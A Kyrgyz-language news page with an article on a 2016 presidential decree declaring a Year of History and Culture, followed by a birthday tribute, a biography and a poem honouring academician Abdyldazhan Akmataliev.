Жарлыкта Президент соңку кезде кыргызстандыктардын улуттук аң-сезими, жарандык патриотизми өсүү менен баарыбызды бириктирүүчү жана шыктандыруучу жалпы идеялар жаралып, жарандарыбыз улуттук таламдардын маани-маңызын терең түшүнө баштагандыгы байкалып, этносуна жана динине карабай кыргызстандыктардын жалпы жүрүм-турум үлгүлөрү пайда болуп жаткандыгына токтолуп, элибиздин биримдигин бекемдөөгө, тил саясатын өркүндөтүүгө, Кыргызстан тарыхынын негизги этаптарын иретке салууга багытталган программалык документтер ишке ашырыла баштагандыгын баса белгилеген. Бирок ошентсе да, тарыхый жана маданий бай мураска ээ болуп туруп, өлкөбүз өз өнүгүүсүндө бул кудурет-күчүн жетишсиз пайдаланып жаткандыгын айткан мамлекет башчыбыз акыркы жылдары Кыргызстандын окумуштуулары, асыресе тарыхчылар жана башка социалдык илимдердин өкүлдөрү изилдөөлөрдү жандандырып жаткандыгына токтолгон.

- Бирок өлкөбүздү мындан ары өнүктүрүү кызыкчылыктары бул иштерди дагы күчөтүүнү талап кылууда. Жаңы изилдөөлөр Кыргызстан тарыхынын жана маданиятынын чала изилденген жерлерин ачыкка чыгарып, аларга бирдиктүү көз карашты калыптандырууга тийиш, — дейт Президент жарлыгында.

Жарлыкта маданият чөйрөсүндө мамлекеттик саясатты өркүндөтүү өзгөчө зарылдыгы жана кошумча ресурстарды тартуунун эсебинен өз ишин өнүктүрүүгө күч үрөгөн айрым маданий мекемелердин жигердүү иштери мамлекеттин колдоосуна муктаж экендиги да айтылган.

- Мамлекет маданиятты жана искусствону өнүктүрүүгө жетиштүү көңүл бурбай жаткандыктан, маданий инфраструктура азыркы талаптарга төп келбей калгандыктан, өзгөчө жаңы ыкмалар жана идеялар жок болгондуктан Кыргызстандын жаштары үчүн адеп-ахлактык жаңы багыттар калыптанбай калды. Бул көрүнүш бир жагынан көпчүлүк жаштардагы руханий боштукту бөтөн, көбүнесе ашынган диний идеялардын жана жашоо образдарынын ээлеп алышын шарттап жатат. Ошол эле учурда ар башка доорлордо, анын ичинде чыгыш-мусулман ренессанс жана агартуучу ислам мезгилинде дүйнөлүк маданият жана илим дал биздин аймактан өнүгүүгө карай жаңы дем-күч алган. Адамзат цивилизациясынын өнүгүүсүнө салым кошкон залкар ойчулдар ушул жерде жашап, чыгармаларды жаратышкан. Экинчи жагынан улуттук каада-салттарды жана үрп-адаттарды кайра жаратуу шылтоосу менен ысыраптуу жалган салттар жана керектөөчүлүк психология таңууланууда. Бул көрүнүш үй-бүлөнүн жашоо абалына, балдардын жана жаштардын билимине, интеллектуалдык жана руханий өнүгүүсүнө залакасын тийгизүүдө, — деп айтылат жарлыкта.

2016-жылы Кыргыз Республикасынын мамлекеттик эгемендигине 25 жыл толот. Кыргызстандыктар, бүт түрк дүйнөсү залкар ойчул Жусуп Баласагындын 1000 жылдыгын белгилейт. Мекенибиздин көз карандысыздыгы үчүн күрөшкөн Тайлак баатырдын 220 жылдыгы белгиленет. 1916-жылдагы улуттук-боштондук көтөрүлүштүн 100 жылдыгына арналган иш-чараларга өзгөчө маани берилет. Ошондой эле Кыргыз АССРинин түзүлгөндүгүнө 90 жыл, Кыргыз ССРинин түзүлгөндүгүнө 80 жыл толот. Бул окуялар жана инсандар Кыргыз мамлекеттүүлүгүн калыптандырууга зор салым кошкон жана Кыргызстан элинин тарыхый, маданий мурасында өзгөчө орду бар. Андыктан Кыргызстан элинин тарыхый жана маданий бай мурастарын мындан ары арттырууда, өлкөбүздү өнүктүрүүнүн улуттук моделин түзүүдө жана ишке ашырууда бул кудурет-күчтү натыйжалуу пайдалануу, адеп-ыймандык жаңы багыттарды жаратуу, кубаттуу, бакубат мамлекетти куруу тилеги менен жарандарды бириктирүү максатында Президент А.Атамбаев бул жылды татыктуу өткөрүү үчүн бир катар тапшырмаларды койду.

Ага ылайык облустарда, райондордо, шаарларда жана айыл аймактарында, анын ичинде билим берүү, илим жана маданият мекемелеринде Кыргызстан тарыхын жана маданиятын изилдөө жана жайылтуу, мамлекеттүүлүктү жана өлкөбүздүн экономикасын мындан ары бекемдөө милдеттерин элибиздин руханий кайра жаралуусу менен тыгыз байланыштыруу, мамлекеттин демократиялык мүнөзүн бекемдөө, азыркы улуттук маданиятты андан ары өнүктүрүү үчүн руханий мурасты жана материалдык маданияттын эстеликтерин сактоо, коргоо жана кеңири жайылтуу иштери колго алынышы керек. Андан сырткары калк конуштарынын, кичи райондордун, көчөлөрдүн тарыхын, салттарын жана азыркы талаптарды эске алуу менен алардын кайталангыс маданий келбетин калыптандыруу жана жакшыртуу пландары менен программаларын иштеп чыгуу жана жүзөгө ашыруу боюнча жергиликтүү мамлекеттик администрациялардын, жергиликтүү өз алдынча башкаруу органдарынын демилгелерин колдоо, тарыхый-маданий мурастын обьекттерин, анын ичинде археологиялык жана архитектуралык эстеликтерди сактоого көзөмөлдү күчөтүү үчүн мыйзамдарга өзгөртүүлөрдү киргизүү ишке ашырылат.

Тарых жана маданият жылында улуттук жана жергиликтүү маанидеги тарыхый эстеликтер реставрацияланып, мектепте билим берүүнүн мекен таануу компонентине киргизилип, ички туризмдин маршруттары өнүктүрүлөт. Изилдөөчүлөр, окуу китептеринин жана окуу куралдарынын, илимий-популярдуу басылмалардын, адабияттын, балдар адабиятынын авторлору үчүн “Тарых, маданият жана келечек” гранттык программасы түзүлүп, аны ишке ашыруу аркылуу окумуштуулардын, тарыхый жана башка социалдык-гуманитардык илимдердин өкүлдөрүнө дем берилет.

Билим берүү мекемелеринде болсо тарыхты, мамлекеттик тилди жана маданияттын негиздерин окутуунун сапатын жакшыртуу иштери аткарылып, окутуунун заманбап методологиялары жана усулдары боюнча тарых жана социалдык-гуманитардык сабактардын мугалимдеринин адистигин жогорулатуу боюнча курстар уюштурулуп, аймактар арасында тажрыйба алмашуу жүргүзүлөт.
Учурда бул жарлыкты ишке ашыруу үчүн мамлекеттик мекемелерде бир жылдык иш-чаралардын планы түзүлүп, сунуштар берилүүдө. Айдын башында Билим берүү жана илим министрлигинде дагы атайын жыйын өтүп, анда жогорку окуу жайлардын жетекчилерине Тарых жана маданият жылында өткөрүлө турган иш-чаралардын планын түзүп, министрликке сунуштоо тапшырмасы берилди.Жарлыкта мамлекеттүүлүгүбүздү бекемдөө максатында Кыргыз Республикасынын Президентине караштуу Тарых илимин өнүктүрүү боюнча комиссия заманбап методологиянын жана сабактарды шайкеш келтирүү ыкмаларынын, анын ичинде универсалдуу тарых курсунун негизинде Кыргызстандын тарых жана маданият ресурстарын кеңири пайдаланууга, илимий чөйрөдө өлкөнүн тарыхына, анын негизги этаптарына бирдиктүү көз карашты калыптандырууга өбөлгө боло турган чаралар боюнча сунуштарды киргизүү тапшырмасы дагы коюлган.

Ишенаалы Арабаев атындагы Кыргыз мамлекеттик университети бул жылы илимий конференцияларды өткөрүү менен гана чектелбестен, монографияларды чыгарып, дагы бир катар иш-чараларды өткөрүп, илимий ачылыштарды жасоону пландаштырууда. Ал үчүн окуу жайдын тарыхчылары үч топко бөлүнүштү.

- Биздин окуу жай тарых илими боюнча квалификациялуу илимпоздор топтолгон окуу жай. Ошондуктан тарыхчы окутуучулар бул жылы билек түрүнө киришип жатабыз. Атайын үч топко бөлүнүп иш алып барууну пландадык. Биринчи топ Кыргыз АССРинин түзүлгөндүгүнүн 90 жылдыгы, экинчи топ эгемендиктин 25 жылдыгы, үчүнчү топ Үркүндүн 100 жылдыгы боюнча иштейт. Биз Үркүндү изилдөөгө өзгөчө көңүл бөлүп жатабыз. Буга чейин 16-жылдагы көтөрүлүштүн маселелери боюнча эки экспедиция Кытайга, Алматага барып келген. Эми бир экспедиция Санкт-Петербургга барат. Үркүндү үч фактордо карап жатабыз: биринчиси, диний, экинчиси, эл аралык, үчүнчүсү, Кытайда калып калган кыргыздардын абалы, — дейт окуу жайдын жетекчиси Төлөбек Абдырахманов.

Бул жылы Улуттук илимдер академиясынын дагы аткара турган иши көп. Академиянын Тарых жана маданий мурас институтунун директору Джуманалиев Акылбектин айтымында, быйыл өзгөчө тарыхчылар үчүн иштей турган жыл.

- Учурда бир жылдык план иштелип жатат. Жасай турган иштер абдан көп. Конференцияларды, аңгемелешүүлөрдү Бишкекте жана жер-жерлерде, эмгек жамааттарда, жождордо, мектептерде өткөрүшүбүз керек. Илимий иш-чараларда жасалган баяндамаларды китеп кылып  чыгаруу маселеси турат. Тарыхый-мурас эстеликтерин сактап калуу, мындан ары аларды изилдөө маселеси да бар. Өзгөчө мамлекеттин эгемендүүлүгүнө жол ачып берген Кыргыз АССРинин маанисин толук ачып беришибиз керек. Мамлекеттүүлүктүн этаптары болбогондо Кыргызстан өзүнчө мамлекет болуп калат беле, жокпу, ушунун баарын жаштарга жеткиришибиз керек, — дейт  Джуманалиев Акылбек. — Быйыл Үркүндүн 100 жылдыгы да болот. Жайында Москвада өтө турган конференцияга катышып, өзүбүздүн ой-пикирлерибизди билдиришибиз керек. Себеби азыр кыргыз коомунда Үркүнгө  баа берүүдө үч багыттагы ой-пикирлер болуп жатат. Ушунун баарын биз далилдеп чыгышыбыз керек. Тайлак баатырдын 220 жылдыгын жалаң эле Бишкекте эмес Ак-Талаа районунда, Нарында өткөрөлүк деп жатабыз. Жусуп Баласагындын 1000 жылдыгына карата “Куттуу билим” чыгармасынын орусчасын дагы, кыргызчасын дагы кайрадан чыгаруу маселесин көтөрүшүбүз керек. Антпесе  азыр анын китебин китеп дүкөндөрдөн табуу абдан кыйын болуп калды. Колдон келсе, каражат табылса мектептерге, жождорго акысыз беришибиз керек.

Учурда республикадагы жогорку окуу жайлар Жусуп Баласагындын 1000 жылдыгын белгилеп, илимий-практикалык конференцияларды өткөрө башташты. Буга чейин тарыхый жайларды сактоо жана кеңири жайылтуу иштерин колго алып келе жаткан жогорку окуу жайлар дагы жок эмес. Мисалы, Ош мамлекеттик университети студенттерди тарыхый жайлар менен тааныштыруу жөрөлгөсүн мындан үч жыл мурун баштаган. Атайын уюштурулган “Ынтымак кербенин” салтка айлантып, үч жылдан бери окуу жайдын эң мыкты жана алдыңкы студенттерин, маданий-массалык иш-чаралардын жеңүүчүлөрүн республиканы кыдыртып, тарыхый жана маданий байлыктар менен тааныштырууну улантып келет. Жакында эле окуу жайда өткөн Эгиздер фестивалынын жеңүүчүлөрүнө жана бардык катышуучуларына дагы республиканы кыдырып келүү мүмкүнчүлүгүн түзүп берди. Башка окуу жайлар дагы бул жөрөлгөнү колго алса, жаштардын тарыхый-маданий жайларды таанып-билүү мүмкүнчүлүгү көбөймөк.

 

Чолпон Кийизбаева, “Кутбилим”

ИНТЕЛЛЕКТУАЛДЫК ДҮЙНөСҮН АСЫЛ САПАТТАР МЕНЕН ШИРЕЛТКЕН ИНСАН

$
0
0

Окумуштуу дос жөнүндө ой толгоо

«Антташып айткан мамиле

Ынтымак менен коштолот.

Бир болгон өйдө-төмөндө

Дос деген сендей дос болот.

Жылдыздар удаа жанашса,

Адамга — адам куш болот.

Бир келген жаман-жакшыда,

Дос деген сендей дос болот».

                                                                                              (Б. Борбиев)

Адатта «тоголок» жаш келгенде юбилярды кесиптештери, дос-жолдоштору менен тууган-уруктары кызуу куттукташат эмеспи. Өзгөчө эл-жерине, тандап алган кесибине жандалбас уруп, бүткүл өмүрүн ошол кесибине арнап, төбөсү көрүнгөн таанымал инсандарга куттуктоо айтуу кыйла татаал жана  жоопкерчиликтүү тура. Анткени залкар жазуучубуз, гуманист-философ, тубаса талант Чыкем айткандай, «күн сайын адам болуш», адамдык касиетти жоготпоо, инсандык абройду түшүрбөй, жараткан берген шыпааны колдон алдырбай жашоо, чындыгында эле ар бир пендеге берилген оор жүк тура. Андыктан, бир чети андай жүктү көтөрүш, коомчулук алдындагы жоопкерчилик менен милдетти аткарыш оңой-олтоң иш эмес дагы, экинчиден, бардык эле адамдардын колунан келе бербейт окшойт. Мен муну менен эмнени айткым бар: 60 жаштын алгылуу белесине жеткен, мекенине, тандап алган адабият таануу  кесибине, элинин көөнөрбөс маданиятына опол тоодой эмгеги сиңген,  Улуттук илимдер академиясынын бир четин, болгондо да «улуттук» деген статус берген коомдук илимдерди жетектеген, бүт өмүрүн ушул академияга арнаган академик досум Мелис (Абдылдажан) Акматалиев жөнүндө азыноолак ой бөлүшсөм дейм. Себеби Мекем, жогоруда сөз кылган адамдык сапаттын сынын түшүрбөй, эли алдында нар көтөргүс кызмат өтөп келе жатат десем аша чапкандык кылбас.

Арийне, аты чыккан белгилүү инсандардын юбилейлери жакындаганда, көбүн эсе аларды мактап-жактап жатып калчу адатыбыз бар эмеспи.  Аны жакындан билген адам катары мен андай ойдон алысмын. Анткени экөөбүздүн академиядагы  өткөргөн өмүрүбүз кырк жылга чукулдап калыптыр. Кырк жыл  бою үзөңгүлөш, илимдеги болгон тепкичтердин баардыгын басып өтүп, ал КР УИАнын вице-президенттигине көтөрүлсө, мен институттун директорлугуна жеттим. Өткөн жылдарда академиялык фундаменталдык илимдин гүлдөп турган учурундагы жана эгемендүүлүктүн мезгилиндеги катаалчылыктарды да баштан бирге өткөздүк. Дегинкиси биздин муун (50-жылдардагы) бактылуулардан экенбиз деп ойлом, анткени биз кылым  оошуп (XX-XXI-кк.) бир коомдук системанын экинчиге (социализмден капитализмге) өтүшүнүн күбөсү эле болбостон  (мындай мезгил ар бир эле муундун тагдырына туш келе бербейт), академиялык илимдин  пайдубалын түптөгөн залкар окумуштуу инсандар менен дагы иштешип калганыбыз үчүн бактыбыз бар деп айтсам ашыкча болбос.

Артка бир кылчайып карасак, илимдин түйшүгүндө жүргөн жылдардын ичинде ал экөөбүз көптөгөн кесиптештерди, жолдош-досторду күткөнгө дагы жетишипбиз. «Биз ким элек, ким болдук» деп, академиялык турмушту эске салганда Мекемдин терең философиялык өңүттө баа берген бир ою бар: «Мен илимдеги өткөн өмүрүбүздү бир маршруттагы автобуста баратканыбыздагыдай элестетем, кокусунан илимге келип калгандар улам бир аялдамадан түшүп калып, туруктуулар дагы деле болсо ичинде кетип бара жаткандайбыз»,  -деген. Чындыгында эле өткөн жылдарда нечендеген убактылуу «илимпозчуларга», «баш оту» менен илимге кирген кесиптештер менен дагы эриш-аркак келе жатабыз. Арийне, жашоонун мыйзамынын үстөмдүгүнөн жалпы пенделердей эле жоготууларга дагы дуушар болдук. Жалпысынан алганда, илим жолундагы турмуш бизди туруктуулукка калыптандырып, окумуштуу деген улуу даражаны татыктуу көтөрүп жүргөнгө тарбиялады деген ойдомун.

Дегинкиси, 60 жаш өзүнчө эле  Байдыкем айткандай, «ашуудан берген отчет» дагы эмеспи.  Ошол ашуудагы отчетко бирөөлөр канжыгасы  жеңил келсе, экинчилери куржун толо дүйнөсү менен жетет. Ал эми Мекемдин жүгү баягы эле Кытайдан  келе жаткан соодагердин кербениндей эле бар. Мунун баардыгына өзүнүн карандай эмгеги, көшөргөн мээнети менен жетти.  Андан сырткары турмуштун парадоксу ушундай экен да: биз бала кезде алтымышка толгон сакал мурутчан аксакалдарды көрүп абышкадай мамиле жасайт элек, азыр жетимиштеги байкени көрүп «абышка» же «чал» дегенге ооз барбайт. Анткени калк ичинде кеңири ооздон-оозго айтылып жүргөндөй, адам жетимишке келгенде «жетилет» деп коет экен. Андыктан Мекем  алтымышка эми гана толуп, азыркы кезде «табында турган аргымак» сыяктуу ишке жана чыгармачылык эргүүгө тойбой турган чагы.  Ошол эмгекчил, өжөр, иштермандыгынын акыбети кайтып,  бүгүнкү күнү  эрдик кылган кыргыз уулу өз эл-жерине эки эсе мээнет өтөп, калктын урмат-сыйына бөлөнүп, татыктуу баасын алып, асмандагы жылдыздай балбылдап жанып, кадыр-барк, абройдун туу  чокусу болгон зоболосу көкөлөп турган чагы.

Бул турмушта  баардыгы болот турбайбы. Сыймыгы артып сыйлыгы көбөйүп кеткенде адамдын көзүн май басып, аркы-беркини аңдабай, көкүрөгү көтөрүлүп, дымагы артып, кечээ эле аралашып, ажырагыстай болуп жүргөн чөйрөсүн жерип, дымагы аттын башындай болуп, ал тургай «күн тийген жердин күкүгүнө» айланып кеткен учурларга көп эле жолугуп, көңүл кирдеткен абалдар деле болот эмеспи.

 

«Нанды бөлүп, бирге жеген тамагы,

Достор бүгүн – достор эмес баягы.

Кекирейтет, сөөмөйлөрүн чычайтат,

Колундагы бийлик деген таягы».

(А. Акматалиев «Көңүлдөгү өмүр»,-Б.:2015. 171 б.)

 

Мекем ушул куракка келгенге чейин адамдагы мындай ыплас сапаттардан алыс болгондугуна, улуу менен кичүүгө бирдей мамиле жасаган жөнөкөйлүгүнө, жупунулугуна ыраазы болом. Кээде ушундай жөнөкөйлүк адамдар тарабынан дайым эле баалана бербестигин эстеп бушайман да болгон учурларым болот.  Эмнеси болсо да анын өмүр, илимий-чыгармачылык изденүү жолунун узак болушун жана ошол өрүү жолдо туткан «адамдык» ыйык касиетине таазим этем десем болот.  Дегеле табият адамдарды бир кылка, окшош кылбай, айрымдарын кара мүртөз, таш боор, жалкоо кылса, кээ бирлерин ак ниет, эмгекчил кылып коет турбайбы. Ошол эмгекчилдик акыры жумурай журт тарабынан эртеби-кечпи бааланат экен. Кубантаары Мекемдин жасап жаткан иштери жалпы коомчулук,Өкмөт тарабынан бааланып жатат жана дагы деле баалана бермекчи десем болот. Кудайга шүгүр, анын ак эмгеги текке кетпей, Кыргыз Республикасынын илимине Эмгек сиңирген ишмер, КР илим жана техника жаатындагы Мамлекеттик сыйлыктын эки жолку лауреаты, КР УИАнын эң жогорку И. Ахунбаев атындагы сыйлыктын ээси, «Манас» ордени, «Даңк» медалы, эл аралык көптөгөн наам-сыйлыктарга татыды.

«Кеп чынынан бузулбайт» дейт эмеспи. Анын сыңары Мекем азыркы кезде эл аралык деңгээлде белгилүү болуп калган окумуштууга айланып отурат. Ал биздин өлкөдө эле эмес, Түркия, Германия, Франция, Бельгия, Люксембург, Кытай, Япония, Корея о.э. жакынкы чет өлкөлөрдө уюштурулуп, өткөрүлгөн көптөгөн илимий конференция, симпозиум жыйындарга активдүү катышып, бир катар баяндамаларды жасагандыгы белгилүү. Анын айрым эмгектери бөлөк тилдерге да которулуп, жарык көргөндүгүн баса белгилей кетүү жөндүү. Мекемдин эмгектеринде Айтматовдун каармандарынын жан-дүйнөсү бай, жогорку маданияттын адамдары экени, жазуучунун чыгармаларынын негизги философиясы – жогорку гуманизм пафосу аркылуу адамдагы кайрымдуулуктун жана асылдык идеясын даңазалангандыгын көрүүгө болот. Ч.Айтматовдун чыгармаларын изилдөө табигый жөндөмдүүлүктү гана эмес чоң теориялык, орошон практикалык билимди да талап кылат. Залкар жазуучунун чыгармалары бир канча мезгил өткөндөн кийин да кайра жаңырып, жаңы мазмуну ачылып турары калетсиз, анын сыңары Мекемдин изилдөөлөрүнүн дөөлөтү да ошол сындуу табышмактуу касиетке ээ боло берет деген ишеничтемин.

Демек, ал диалектикалык маанайда чыгармачыл-масштабдуу ой жүгүрткөн инсан, келечекке ишенимдүү серп салган окумуштуу жана уюштуруучу иретинде илим-билимге бүтүндөй жан дили, атуулдук дарамети менен берилип, чыгармачыл изилдөөнүн карама-каршылыктуу дүйнөсүнө улам сүңгүп, өз элинин, айрыкча коомчулуктун алдында ак эмгек өтөп жатат десек эч жаңылышпайбыз.

Мекем бүгүнкү күндө  интеллектуалдык дүйнөсүн асыл  сапаттар менен ширелткен инсан иретинде тазалыктын, эмгекчилдиктин, абийирдүүлүктүн, жөнөкөйлүктүн, кесипкөйлүктүн, мекенчилдиктин кийинки илимпоздук ишмердикти аркалаган муундар үчүн үлгүсүн көрсөттү деп айтууга толук негиз бар. Деген менен анын жазганынан жаза элеги, ачканынан ача элеги, айтканынан айта элеги али арбын деп ырастоого толук акылуубуз. Анын алдында дагы аша турган ашуусу, кече турган терең далай дарыялар, басып өтө турган узак жолдор күтүп турганы айдан ачык. Андыктан алардын баарын буюрса, досум арт жагына калтыраарынан да эч кандай шек саноого болбойт деп бекем ишенем. Көрсө, «талант деген – токсон тогуз пайыз эмгек» деп бекеринен айтылбаса керек. Ошондуктан кажыбас кайратты майтарылбаган эрки менен элге таанылган таланттуу инсандардын турмушу татымдуу экендигин эч танууга болбойт. Анын уюштуруучулугун, лидерлигин «Манаста» айтылгандай,«алдына салса ак жолтой, артта жүрсө сан колдой» азаматтыгын, адамгерчилигин айтып жазгандар жеке эле мен болбосом керек. «Эр эмгегин эл баалайт» демекчи, анын эмгектери, илимдеги аракеттеринин баардыгы күнүбүгүнкүдөй менин көз алдымда. Бүгүнкү 60 жаш кутман курагыңда чын ниеттен кааларым, асыл иштериңдин айлампасында ар дайым аман болуп, алгалай бер досум — Меке!

 

О.А.Тогусаков, КР УИАнын Философия жана саясий-укуктук изилдөөлөр институтунун директору, КР УИАнын корреспондент-мүчөсү, КР Илимине эмгек сиңирген ишмер, КР Мамлекеттик жана И.Ахунбаев атындагы жогорку академиялык сыйлыктарынын лауреаты, философия илимдеринин доктору, профессор

 

А.Акматалиев баскан жол

 

Жыл жаңырары менен белгилүү окумуштуу,Кыргыз Республикасынын Илимине эмгек сиңирген ишмерАбдылдажан Акматалиев  бүтүндөй агартуу тармагынын өкүлдөрү жана илимий чөйрө менен биргеликте  60 жылдык мааракесин белгилөө алдында турат. Юбилярдын замандаштары айтмакчы, жарым кылымдан ашык өмүрүндө А.Акматалиев нар көтөргүс иш жасап, илим айдыңында ушул күнгө чейин күжүрмөндүк менен эмгектенип келет. Маараке алдында илимпоздун  өмүрүнүн жана илимий,  коомдук ишмердүүлүгүнүн негизги учурларына сарэсеп салабыз.  

 

Өмүр баяны: 1956-жылы 15-январда туулган. 1972-жылы Фрунзе шаарынын №5 орто мектебин аяктаган. 1977-жылы Кыргыз мамлекеттик университетинин филология факультетин бүтүргөн. 1977-1979-жылдары Ош педагогикалык институтунда мугалим болуп иштеген. 1979-жылдан  баштап бүгүнкү күнгө чейин Илимдер академиясында иштейт. Тил жана адабият институту 1992-1994-жыл, Манастаануу жана көркөм маданияттын Улуттук борбору 1995-2008-жыл, Ч.Айтматов атындагы Тил жана адабият институту 2008-2013-жылга чейин институттардын директору, 1992-жылдан 2013-жылга чейин институттун директору, 2013-жылдан бери вице-президент. Эмгек стажысы – 39 жыл.

 

Илимий-педагогикалык эмгектери: 45 монография, китеп, 7 брошюранын, 650 макаланын, маектин автору. Эмгектери түрк, орус, англис, немец, француз, кытай, япон, казак, өзбек, азербайжан тилдеринде жарык көргөн. Жетекчилиги менен кыргыз маданиятына байланыштуу 500дөн ашуун ири эмгектер:. “Эл адабияты” (31 том) сериясы, “Залкарлар” (7 том) сериясы, “Орусча-кыргызча” (4 том) сөздүк, кыргыз жана орус тилдеринде, “Ч.Айтматовдун чыгармаларынын 8 томдугу”, С.Каралаевдин (4 том) жана С.Орозбаковдун вариантында “Манас” (9 том) “Кыргыз тилинин түшүндүрмө сөздүгү” (2 том), “Сагымбай”, “Алыкул Осмонов”, “Токтогул” энциклопедиялары, Махмуд Кашгаринин “Түрк сөздөр жыйнагынын” (3 том), Жусуп Баласагындын “Кут алчу билим” (3 том), “Түрк адабиятынын жыйнактары” (33 том) ж.б. жарыкка чыккан. 1992-2015-жылдары 1000ден ашуун китептерди демөөрчү таап  чыгарган, алар окуу китеби жана окуу куралы катары коомчулукта кеңири пайдаланылып жатат.

 

Илимий-педагогикалык кадры: Диссертациялык кеңештин төрагасы (1994-2006, 2013-2015-ж.),  ЖАКтын эксперти (2006-2008-ж), Президиумдун мүчөсү (2009-2013-ж.) катары 200дөн ашуун кадрлардын чыгышына камкордук кылган. Өзү  12 илимдин докторун, 57 илимдин кандидатын даярдаган. Кадрлары республиканын бардык региондорун камтыйт, ошону менен бирге орус, түрк, кытай, казак улутунан да бар.

Илимий багыттары: Кыргыз тили, адабияты жана маданияты, “Манас” эпосу, Ч.Айтматов, фольклор, акындар поэзиясы, профессионал адабияты, кыргыз маданияты.

 

Илимий наам, даражалары: Илимдер академиясынын академиги, филология илимдеринин доктору, профессор, Кыргыз Республикасынын Илимине эмгек сиңирген ишмер, Кыргыз Республикасынын илим жана техника жаатындагы Мамлекеттик сыйлыктын эки жолку лауреаты, Кыргызстан Ленин комсомолу сыйлыгынын лауреаты, Эл агартуунун отличниги, Ж.Баласагын атындагы Улуттук университетинин, К.Карасаев атындагы Бишкек гуманитардык университетинин, И.Арабаев атындагы Кыргыз мамлекеттик университетинин, Ош мамлекеттик университетинин, Жалал-Абад мамлекеттик университетинин, К.Тыныстанов атындагы ЫМУнун, Талас мамлекеттик университетинин, Нарын мамлекеттик университетинин, Махмуд Кашгари Барсканы атындагы Чыгыш университетинин, Ата Түрк-Ала-Тоо университетинин жана Япониянын Сока-Гаккай университетинин Ардактуу профессору, Түркиянын тил коомунун академиги, Америка Калифорния Илимдер жана искусство академиясынын академиги.

 

Сыйлыктары: СССРдин “Эмгектеги артыкчылыгы” медалы, ВЛКСМ БКнын Ардак грамотасы, ЛКСМ БКнын Ардак грамотасы, III даражадагы “Манас” ордени, “Даңк” медалы, Россиянын Кыргызстандагы элчилигинин Ардак грамотасы, Казакстандын Кыргызстандагы элчилигинин Ардак грамотасы, Түштүк Кореянын Маданият жана туризм министрлигинин Ардак грамотасы,  Казакстандын Л.Гумилев атындагы университеттин Гумилев медалы, Бишкек шаарынын, Ош шаарынын Ардак грамотасы, Нарын жана Талас областарынын, Нарын жана Токтогул райондорунун Ардактуу атуулу, Бишкек шаарынын ардактуу атуулу, академик И.Ахунбаев атындагы сыйлыктын лауреаты,  Кыргыз Республикасынын Жогорку Кеңешинин Ардак Грамотасы ж.б.

Илимий-педагогикалык ишмердүүлүгү: Эл аралык 160 жана республикалык 600дөн ашуун илимий-практикалык конференциянын уюштуруучусу жана катышуучусу. Москва, Пекин, Токио, СЕУЛ, Астана, Париж, Анкара, Стамбул, Кония, Элазык, Измир, Баку, Ташкент, Ашхабад, Нукус, Казан, Уфа, Алма-Ата, Жамбыл, Түркстан, Кызыл Ордо, Алтай, Абакан ж.б. шаарларда илимий докладдарды окуган.

 

Республикалык жана чет элдик илимий-практикалык ишмердүүлүгү: Кыргыз улуттук университеттин, Кыргыз-Түрк “Манас” университетинин, И.Арабаев атындагы КМУнун, С.Демирель университетинин, Казак-Түрк Ахмед Ясави атындагы университетинин жана Түркиянын Анкара университетинин окутуучусу, “Билге” журналынын (Түркия), “Билиг” журналынын (Түркия), “Кардеш калемгер” журналынын (Түркия), “Түркология” журналынын (Казакстан), “Алтаистика” жана “Түркология” (Казакстан) журналынын, “Түрк ааламы” газетасынын (Казакстан), “Кыргызстан маданияты” газетасынын (Кыргызстан), “Кыргыз тили” (Кыргызстан), “Адабий Ала-Тоо” гезитинин (Кыргызстан), “Эл агартуу” журналынын (Кыргызстан), “Тил, адабият жана искусство” журналынын (Кыргызстан), “Мурас” журналынын (Кыргызстан) ж.б. редколлегия мүчөсү.

 

Коомдук ишмердүүлүгү: Түштүк Корея республикасынын Азия маданий шаарынын куруу боюнча эл аралык кеңешинин мүчөсү, Жазуучулар Союзунун мүчөсү, Журналисттер Союзунун мүчөсү, Ысык-Көл форумунун катышуучусу.

 

 

 Замандаштардан бир ооз кеп

А.Сайфуллаев, филология илимдеринин доктору, профессор,

Тажик ССРинин Маданиятына эмгек сиңирген ишмер:

- А.Акматалиевдин темасы конкреттүү. Теманын изилдөө обьектиси азербайжан, өзбек, түркмөн, татар, казак, каракалпак адабияттарынын өнүгүшүнө байланышкан материалдар болуп, аларга өзгөчө басым жасалат. Автордун түрк тилиндеги адабияттар менен эң сонун тааныш экендиги жакшы сезилип турат. Бул – түрк тилиндеги жогоруда аталган адабияттарды алардын өз ара байланыштарында жана өз ара аракеттеринде жалпылаган туңгуч эмгек.

“Эркин-Тоо”, 1991, 14-август.

 

К.Каракеев, академик:

- Мага бөтөнчө илимпоздун изилдөө принциби менен методикасы жакты. Эмгектерде тарых, адабият таануу илимдеринде али күнгө  чейин ар тараптуу анализдөөнүн объектисине айлана элек илимий булактар алгач жолу комплекстүү салыштырылып, жалпыланып, терең эриш-аркак иликтенген.

“Кутбилим”, 2000, 30-ноябрь.

 

А.Измаилов, академик:

- А.Акматалиевдин кийинки жарык көргөн эки китебин мен ата-бабалардын оозеки сапатынан, улуттук каада-салттардан улам алыстап бара жаткан кыргыз жаштарына, жеткинчектерге арналган баалуу белек деп эсептейм.

“Эркин Тоо”, 2000, 6-декабрь.

 

Байлыгым менин – шакирттерим ээрчиген…

Абдылдажан Акматалиев

  Байлыгым менин – шакирттерим ээрчиген,

Тагдырлары мен аркылуу чечилген.

Турмуш деген татаал жолдо келатат,

Кыркар тарткан кырк чородой сезилген.

 

Түрдүү-түмөн ойлор менен алышып,

Казуу үчүн илим кенин карышып.

Өткөөл заман кыйындыкка карабай,

Келаткандай ат чабышта жарышып.

 

Байге алгыла – ар кимиңер өзгөчө,

Ак эмгектүү жетет ага көздөсө.

Жайгаштырып, келсем улам тизмелеп,

Мамлекет сыяктанат өзүнчө.

 

Желектери тураар бийик асылып,

Күлкү-шаттык маңдайында чачылып.

Эл-жер үчүн кызмат кылса чын дилден,

Такшалышат, тажрыйбасы артылып.

 

Дүйшөндүн да болгон бир кез мектеби,

Ысык-суукка чыдап келген эстеби?!

Шакирттерден күтүп келем мен дагы,

Алтынайдай академик кездеги.

 

Билим жолун кетсе алдыга узартып,

Ойлорумду жаңылашып улантып.

Эл алдында жүзүм жарык көрүнөт,

Шакирттерим турса мени кубантып.

 

Жолун тосуп көрө албастар кайдагы,

Ушагында тумандатса жаш жанды.

Ишенбедим, ишенгеним “Абийир” – деп,

Мамилемден өзгөрбөдүм мурдагы.

 

Душмандардан ичке кирген – азыткы,

Сактай албай тебелеткен актыкты.

Көлөкөдөн корккон айрым суу жүрөк,

Анан чыкты кээ бирөөлөр сасыткы.

 

